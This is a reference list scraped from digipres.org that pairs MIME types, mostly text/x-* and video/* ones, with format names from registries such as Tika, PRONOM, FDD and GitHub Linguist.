OpenRC runscript githublinguist
Ignore List githublinguist
ShellSession githublinguist
Alpine Abuild githublinguist
Git Attributes githublinguist
Tcsh githublinguist
text/x-slimSlim githublinguist
text/x-smartySmarty githublinguist
Latte githublinguist
Mustache githublinguist
text/x-soyClosure Templates githublinguist
text/x-spreadsheetLTspice Symbol githublinguist
text/x-stexBibTeX githublinguist
TeX githublinguist
text/x-swiftSwift githublinguist
text/x-systemverilogSystemVerilog githublinguist
text/x-texinfoapplication/x-texinfo tika
text/x-textileTextile githublinguist
text/x-tika-text-based-messageText-based (non-binary) Message tika
—  message/newsmessage/news tika
—  message/rfc822Internet e-mail message format ffw
message/rfc822 tika
Microsoft Web Archive pronom
Internet Message Format pronom
Internet Message Format fdd
Email (Electronic Mail Format) fdd
— —  message/rfc822; version=”1.0″MIME Email 1.0 pronom
—  message/x-emlxmessage/x-emlx tika
text/x-tomlTOML githublinguist
text/x-ttcn-asnASN.1 githublinguist
text/x-twigTwig githublinguist
text/x-urlInternet Shortcut ffw
text/x-uuencodetext/x-uuencode tika
text/x-vbVisual Basic .NET githublinguist
VBA githublinguist
FreeBasic githublinguist
text/x-webidlWebIDL githublinguist
text/xml-external-parsed-entityapplication/xml-external-parsed-entity tika
text/xslXSL Format tika
XSL Transformations tika
video/3gpp3GP ffw
video/3gpp tika
3GPP Audio/Video File pronom
video/3gpp-ttvideo/3gpp-tt tika
video/3gpp23G2 ffw
video/3gpp2 tika
video/aviAVI ffw
Audio Video Interleave File tika
AVI (Audio Video Interleaved) File Format fdd
video/bmpegvideo/bmpeg tika
video/bt656video/bt656 tika
video/celbvideo/celb tika
video/dvvideo/dv tika
Digital Video pronom
video/examplevideo/example tika
video/h261video/h261 tika
video/h263video/h263 tika
video/h263-1998video/h263-1998 tika
video/h263-2000video/h263-2000 tika
video/h264video/h264 tika
video/jpegvideo/jpeg tika
video/jpeg2000video/jpeg2000 tika
video/mp1svideo/mp1s tika
MPEG-1 Video Coding (H.261) fdd
video/mp2pvideo/mp2p tika
video/mp2tvideo/mp2t tika
MPEG-2 Video Encoding (H.262) fdd
MPEG-2 Encoding Family fdd
video/mp4v-esvideo/mp4v-es tika
MPEG-4 File Format, Version 2 fdd
video/mpegMPEG-1 ffw
MPEG Movie Clip tika
MPEG-1 Program Stream pronom
MPEG-2 Program Stream pronom
MPEG-2 Video Encoding (H.262) fdd
MPEG-1 Video Coding (H.261) fdd
MPEG-2 Encoding Family fdd
video/mpeg2MPEG-2 Video Encoding (H.262) fdd
MPEG-2 Encoding Family fdd
video/mpeg4-genericvideo/mpeg4-generic tika
MPEG-4 File Format, Version 2 fdd
video/mpgMPEG-2 Video Encoding (H.262) fdd
MPEG-1 Video Coding (H.261) fdd
MPEG-2 Encoding Family fdd
video/mpvvideo/mpv tika
MPEG-2 Video Encoding (H.262) fdd
MPEG-1 Video Coding (H.261) fdd
MPEG-2 Encoding Family fdd
video/msvideoAVI ffw
Audio Video Interleave File tika
AVI (Audio Video Interleaved) File Format fdd
video/nvvideo/nv tika
video/parityfecvideo/parityfec tika
video/pointervideo/pointer tika
video/quicktimeQuickTime ffw
video/quicktime tika
Quicktime pronom
QuickTime File Format fdd
—  video/mp4MP4 ffw
video/mp4 tika
MPEG-4 Media File pronom
MPEG-4 File Format for Advanced Video Coding (Non-FRExt Extensions, Part 15) fdd
MPEG-4 File Format, Version 2 fdd
MPEG-4 File Format, Version 1 fdd
— —  video/x-m4vvideo/x-m4v tika
video/rawvideo/raw tika
video/rtp-enc-aescm128video/rtp-enc-aescm128 tika
video/rtxvideo/rtx tika
video/smpte292mvideo/smpte292m tika
video/ulpfecvideo/ulpfec tika
video/vc1video/vc1 tika
video/vnd-vivoVivoActive pronom
video/vnd.aviAVI ffw
AVI (Audio Video Interleaved) File Format fdd
video/vnd.cctvvideo/vnd.cctv tika
video/vnd.dlna.mpeg-ttsvideo/vnd.dlna.mpeg-tts tika
video/vnd.fvtvideo/vnd.fvt tika
video/vnd.hns.videovideo/vnd.hns.video tika
video/vnd.iptvforum.1dparityfec-1010video/vnd.iptvforum.1dparityfec-1010 tika
video/vnd.iptvforum.1dparityfec-2005video/vnd.iptvforum.1dparityfec-2005 tika
video/vnd.iptvforum.2dparityfec-1010video/vnd.iptvforum.2dparityfec-1010 tika
video/vnd.iptvforum.2dparityfec-2005video/vnd.iptvforum.2dparityfec-2005 tika
video/vnd.iptvforum.ttsavcvideo/vnd.iptvforum.ttsavc tika
video/vnd.iptvforum.ttsmpeg2video/vnd.iptvforum.ttsmpeg2 tika
video/vnd.motorola.videovideo/vnd.motorola.video tika
video/vnd.motorola.videopvideo/vnd.motorola.videop tika
video/vnd.mpegurlvideo/vnd.mpegurl tika
video/vnd.ms-playready.media.pyvvideo/vnd.ms-playready.media.pyv tika
video/vnd.nokia.interleaved-multimediavideo/vnd.nokia.interleaved-multimedia tika
video/vnd.nokia.videovoipvideo/vnd.nokia.videovoip tika
video/vnd.objectvideovideo/vnd.objectvideo tika
video/vnd.radgamettools.binkBink Video ffw
—  video/vnd.radgamettools.bink; version=”2″Bink Video Format 2 pronom
video/vnd.radgamettools.smackerSmacker ffw
video/vnd.rn-realvideoReal Video pronom
RealVideo, Version 10 fdd
video/vnd.sealed.mpeg1video/vnd.sealed.mpeg1 tika
video/vnd.sealed.mpeg4video/vnd.sealed.mpeg4 tika
video/vnd.sealed.swfvideo/vnd.sealed.swf tika
video/vnd.sealedmedia.softseal.movvideo/vnd.sealedmedia.softseal.mov tika
video/vnd.vivovideo/vnd.vivo tika
video/x-dvDV-DIF (Digital Video Digital Interface Format) fdd
video/x-f4vvideo/x-f4v tika
video/x-flcvideo/x-flc tika
video/x-flivideo/x-fli tika
video/x-flvFLV ffw
video/x-flv tika
Macromedia Flash FLV Video File Format fdd
—  video/x-flv; version=”1″Macromedia FLV 1 pronom
video/x-jngvideo/x-jng tika
video/x-matroskaMatroska Multimedia Container fdd
Matroska Multimedia Container fdd
video/x-matroska-3dMatroska Multimedia Container fdd
video/x-mngMNG ffw
video/x-mng tika
Multiple-image Network Graphics pronom
video/x-mpegMPEG-2 Video Encoding (H.262) fdd
MPEG-1 Video Coding (H.261) fdd
MPEG-2 Encoding Family fdd
video/x-mpeg2aMPEG-2 Video Encoding (H.262) fdd
MPEG-2 Encoding Family fdd
video/x-mpgMPEG-2 Video Encoding (H.262) fdd
MPEG-1 Video Coding (H.261) fdd
MPEG-2 Encoding Family fdd
video/x-ms-asfASF ffw
Windows Media Metafile ffw
video/x-ms-asf tika
video/x-ms-asfASF (Advanced Systems Format) fdd
—  audio/x-ms-wmaaudio/x-ms-wma tika
Windows Media Audio pronom
WMA (Windows Media Audio) File Format fdd
—  video/x-ms-wmvWMV ffw
video/x-ms-wmv tika
Windows Media Video pronom
WMV (Windows Media Video) File Format fdd
video/x-ms-asf-pluginASF (Advanced Systems Format) fdd
ASF (Advanced Systems Format) fdd
video/x-ms-asxWindows Media Metafile ffw
video/x-ms-wmvideo/x-ms-wm tika
video/x-ms-wmASF (Advanced Systems Format) fdd
video/x-ms-wmaWMA ffw
video/x-ms-wmxvideo/x-ms-wmx tika
ASF (Advanced Systems Format) fdd
video/x-ms-wvxvideo/x-ms-wvx tika
video/x-msvideoAVI ffw
Audio Video Interleave File tika
Audio/Video Interleaved Format pronom
AVI (Audio Video Interleaved) File Format fdd
video/x-quicktimeQuickTime File Format fdd
video/x-sgi-movieSGI movie ffw
video/x-sgi-movie tika
wwwserver/redirectionInternet Shortcut ffw
x-conference/x-cooltalkCooltalk Audio tika
x-world/x-3dmf3DMF ffw

Source :
https://www.digipres.org/formats/mime-types/